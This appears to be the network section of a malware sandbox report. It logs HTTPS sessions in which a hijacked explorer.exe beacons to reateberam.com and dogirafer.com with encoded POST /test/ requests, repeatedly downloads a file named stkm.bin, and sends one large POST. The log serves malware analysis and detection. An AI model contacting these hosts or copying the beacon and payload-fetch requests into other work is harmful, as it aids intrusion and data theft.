                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dfI64oB%2FTCAAIQXBvzm3%2BOlEBq0e3km5HRET%2F%2BOFtPSxXcJXLO8k3X6qdZNkqXgO2eHljjEk1Lr8Xjk1MN6P%2FbyN8G9XpOtqL8X29Iq%2FY2xIVa8CDWuv04ifAPrEoRHvJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd20850ae35e72-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1751&rtt_var=701&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1512953&cwnd=193&unsent_bytes=0&cid=523f52900f0abd16&ts=776&x=0"
                                                                  2024-12-02 17:44:48 UTC50INData Raw: 32 63 0d 0a 50 69 36 56 54 63 75 36 32 59 70 67 5a 78 7a 5a 68 32 50 6a 67 33 35 50 4f 45 76 66 41 30 36 70 62 50 71 36 76 69 66 46 4b 52 69 62 0d 0a
                                                                  Data Ascii: 2cPi6VTcu62YpgZxzZh2Pjg35POEvfA06pbPq6vifFKRib
                                                                  2024-12-02 17:44:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49922 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-02 17:44:50 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
2024-12-02 17:44:50 UTC | 791 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:44:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9EV8Q%2FAKjzZ1NgxrZhghToGONYvdKgLT5dohopYro1CLhBiVosTjXsy0V1Zl6p88uWyzISCqu5vgxSn6NMbjl8p%2FjwXgxa3fET0cZ693LndFd9SCgrkb%2FrzNJjtn7wNDTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd209328bd36a9-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14288&min_rtt=14281&rtt_var=5369&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=203654&cwnd=32&unsent_bytes=0&cid=bc88edd5db5f33bd&ts=803&x=0"
                                                                  2024-12-02 17:44:50 UTC431INData Raw: 31 61 38 0d 0a 50 43 79 62 51 4d 75 31 33 59 70 6a 61 68 76 62 67 32 44 6a 67 33 52 49 4f 30 33 54 41 45 36 6c 61 76 6d 77 75 79 58 4f 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 52 6f 4a 45 38 72 66 4a 4f 4f 67 6c 67 68 44 37 4b 2f 74 75 30 4e 73 5a 57 75 6f 4d 38 2b 67 69 56 54 48 57 46 45 35 73 54 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 38 77 7a 44 65 72 6e 49 33 4d 59 61 4c 37 45 65 6e 67 70 71 34 56 43 36 6c 4c 59 44 78 77 70 68 6b 6f 38 4f 56 34 4c 4e 38 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 52 53 54 70
                                                                  Data Ascii: 1a8PCybQMu13Ypjahvbg2Djg3RIO03TAE6lavmwuyXOKRib7xuPoA21j4bUizRoJE8rfJOOglghD7K/tu0NsZWuoM8+giVTHWFE5sTsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4F8wzDernI3MYaL7Eengpq4VC6lLYDxwphko8OV4LN8C9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfRSTp
                                                                  2024-12-02 17:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49928 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-02 17:44:52 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hldViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
2024-12-02 17:44:53 UTC | 796 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:44:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uedJheL%2BVrqoYnddSjiyKtcHLYojYh%2F1KuiGOR%2FiANMSnL%2FrkYhgp7Q1Dq8sO%2BRm9W6qGheMxlpeBgSAlIQNLUpS35OCR%2Bb5AUszhkATENblhqklbwAWw1cO373DdYeogg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd20a0ce898c84-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1854&min_rtt=1850&rtt_var=701&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=1551540&cwnd=175&unsent_bytes=0&cid=52ba0c83c9f5e303&ts=753&x=0"
                                                                  2024-12-02 17:44:53 UTC431INData Raw: 31 61 38 0d 0a 50 53 6d 55 54 4d 4f 31 33 59 70 76 59 52 6e 61 6a 47 48 6f 67 33 52 47 4d 6b 33 52 42 53 4c 43 61 50 6d 33 76 79 4c 45 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 4a 30 45 6a 66 4a 66 6f 37 46 30 6e 44 37 75 32 74 71 4a 47 74 5a 47 76 70 4d 73 35 37 55 35 57 47 32 42 45 35 38 43 6a 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 41 32 41 75 6a 6e 4a 42 68 2b 61 62 37 44 66 6e 6b 75 34 4d 74 46 37 46 58 63 41 42 35 4f 37 45 30 34 4d 56 4d 4f 4e 6f 7a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 52 52 70
                                                                  Data Ascii: 1a8PSmUTMO13YpvYRnajGHog3RGMk3RBSLCaPm3vyLEYmmcphSGpB6yiJiVjA1pJ0EjfJfo7F0nD7u2tqJGtZGvpMs57U5WG2BE58CjfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcA2AujnJBh+ab7Dfnku4MtF7FXcAB5O7E04MVMONozMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1RRp
                                                                  2024-12-02 17:44:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49934 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-02 17:44:55 UTC | 127 | OUT | GET /files/stkm.bin HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
2024-12-02 17:44:56 UTC | 948 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:44:56 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 857600
                                                                  Connection: close
                                                                  Content-Disposition: attachment; filename = stkm.bin
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: HIT
                                                                  Age: 224
                                                                  Last-Modified: Mon, 02 Dec 2024 17:41:12 GMT
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gON8IKGktM4rZ7sLDmTqQ8KdB4z%2F01%2FRpyeE%2BXLqDylShs1uPUp7FiQV9fA%2BAUa5ujUc8PYaEbTIAOMtu09bEmOerymq31tJTBY%2FFrOwhDOwPlUdC3XqNT9eer08dSQNzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd20b62d038cb3-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2070&min_rtt=1897&rtt_var=835&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=765&delivery_rate=1539272&cwnd=219&unsent_bytes=0&cid=b8eba4bc3697e437&ts=1813&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49941 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-02 17:44:59 UTC | 151 | OUT | GET /files/stkm.bin HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Connection: Keep-Alive
2024-12-02 17:44:59 UTC | 954 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:44:59 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 857600
                                                                  Connection: close
                                                                  Content-Disposition: attachment; filename = stkm.bin
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: HIT
                                                                  Age: 227
                                                                  Last-Modified: Mon, 02 Dec 2024 17:41:12 GMT
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E06d5Hvls%2BlI4GGMQ8661AXvEK%2FQ59XiOx0UdigqO9qMYZLA%2F4lmAKRLeJk51bL4Bq6zrRZ%2F9GXkKd6P%2Bst5H95Z0enLQTMnTyWQBEX6NFTFLaFLx%2F%2F9%2BRMtaHTWm3Ltzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd20ca8d32de9b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1645&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=765&delivery_rate=1723730&cwnd=176&unsent_bytes=0&cid=837781f43966d4a3&ts=1835&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  6 | 192.168.2.5 | 49950 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:02 UTC | 127 | OUT | GET /files/stkm.bin HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  2024-12-02 17:45:02 UTC | 953 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:02 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 857600
                                                                  Connection: close
                                                                  Content-Disposition: attachment; filename = stkm.bin
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: HIT
                                                                  Age: 225
                                                                  Last-Modified: Mon, 02 Dec 2024 17:41:17 GMT
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4EOlxqxUJpROZ5%2BZCP7WeyhkUkw9rK8PrPrAREA%2Bah%2Bdr%2B7vWaVfm2%2BX6xIMXZ0uMKxe5nvJJ3Zb6Q7CAY%2BQPQEuDoOHjDh3H%2BtkgdsBdAgCTDRm3jmIsRqr6ddkNrVwOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd20dd2d93a21a-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14171&min_rtt=14161&rtt_var=5318&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=765&delivery_rate=206200&cwnd=32&unsent_bytes=0&cid=6ad9a6dc765e8e77&ts=1708&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  7 | 192.168.2.5 | 49962 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:06 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hidViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:07 UTC | 786 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4WlZXslAAr8Y%2B0Efi8RZ9XIxcMHvm44CFLwcimOHeVTmWTdORONC3tOSsO60UH9j7tck7Wn0f3KBZav2KGQluszd2dhr4l0Zqqjg4hRSEuvPYlP1UItnAH4tORh7poWWGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd20f84d254322-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2236&min_rtt=2229&rtt_var=850&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1277340&cwnd=221&unsent_bytes=0&cid=1f183507da8aab0e&ts=743&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  8 | 192.168.2.5 | 49972 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:09 UTC | 410 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hjdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:12 UTC | 782 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jRkskUANNafWbJKgWYT1eNuqX68738gDGp%2BOekoHyWDWZ2mOc6Oizp9R88sXj%2Fprn0y6jHzxAcftzRSkQ0p91LS1ZiMBVcAfmgKNXghKidxVR1Vh4OSqGjgdGGrlmGob"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd210d9cdaab57-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13829&min_rtt=13823&rtt_var=5196&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=210450&cwnd=32&unsent_bytes=0&cid=82b6558e3c8da119&ts=2556&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  9 | 192.168.2.5 | 49980 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:13 UTC | 410 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hgdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:15 UTC | 791 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RlfWRwafuS7SV2OwM1%2FwBLSRv8BNupIrulJI3Xfg%2BfaK%2BBD9O9U2YwMPJbJllw6%2Bhu%2FzsNTRnUmep1xNQrZxuKk%2FTQUZSAznwzByAxJ6MO%2FC4plfARGAq2AcW0RtrxO5"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd212669620f7c-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1521&min_rtt=1516&rtt_var=579&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1872995&cwnd=226&unsent_bytes=0&cid=80ff5981ca59dd9e&ts=1637&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  10 | 192.168.2.5 | 49986 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:16 UTC | 410 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hhdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:18 UTC | 785 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rURcdDUxMDsVGcx4MFrURWj55II4ejMEMeGoRSz73%2BdyG%2Fit0RmeJ7xp9lkES%2Bb9m%2FjW6QC8aTAvXHT3GhTQvuaJq6M1Rem7jA9oueB1yjryNsFPqgsMgyEE6romlbK1"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd213b7a4043c3-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1710&rtt_var=646&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1685912&cwnd=211&unsent_bytes=0&cid=d661f53d6cebb1f0&ts=1756&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  11 | 192.168.2.5 | 49995 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:20 UTC | 410 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hudViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:21 UTC | 787 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:21 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PFgjLGC0TndqGRU9eAEIcG87F4aey85tAAjoHiB2f8%2BcQDQIwlgv3v%2BOmu8S8pxlcbQ6nLTO8%2BG%2FsGTcgDrp5FMwFG9zVtjHMCZNDduaOb2lczkysc%2F7NzD3IEhNU1YA"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd214e1aefc44f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1501&rtt_var=587&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1828428&cwnd=251&unsent_bytes=0&cid=46daa7eef1c2d574&ts=1618&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  12 | 192.168.2.5 | 49999 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:23 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hvdViRxTPtzGAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 12232
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:24 UTC | 789 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uk74ygKa1nEoMgfiXQ%2Fe%2F%2FLgcrVEvS2HBx1ZpfQEkdZnNgOMMBSpwlj69cPiybnSIGCKKCYyIVeZy9hVu2KH1abz5d8TA654mYxow2nD%2FQTrTnbIATpq5uAfmQhUk%2FGH"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21600ca14309-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1751&rtt_var=657&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2829&recv_bytes=13328&delivery_rate=1667618&cwnd=232&unsent_bytes=0&cid=678d627545184e58&ts=1579&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  13 | 192.168.2.5 | 50000 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:25 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:27 UTC | 788 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:27 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iPAyb2yxmj%2FtdhY4cI7JoI24DIcV3HLk%2Bb9gUBLNSK4bQ6RpaZpqf1CkDPfwhrMDg%2FWryufWwPDhkNVeyiUrUK1gLi5rhNbeLHRRmhd%2Fv%2B5oU8AvTlbmyHb4xiNoLOjQ"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21734e0eebb6-YYZ
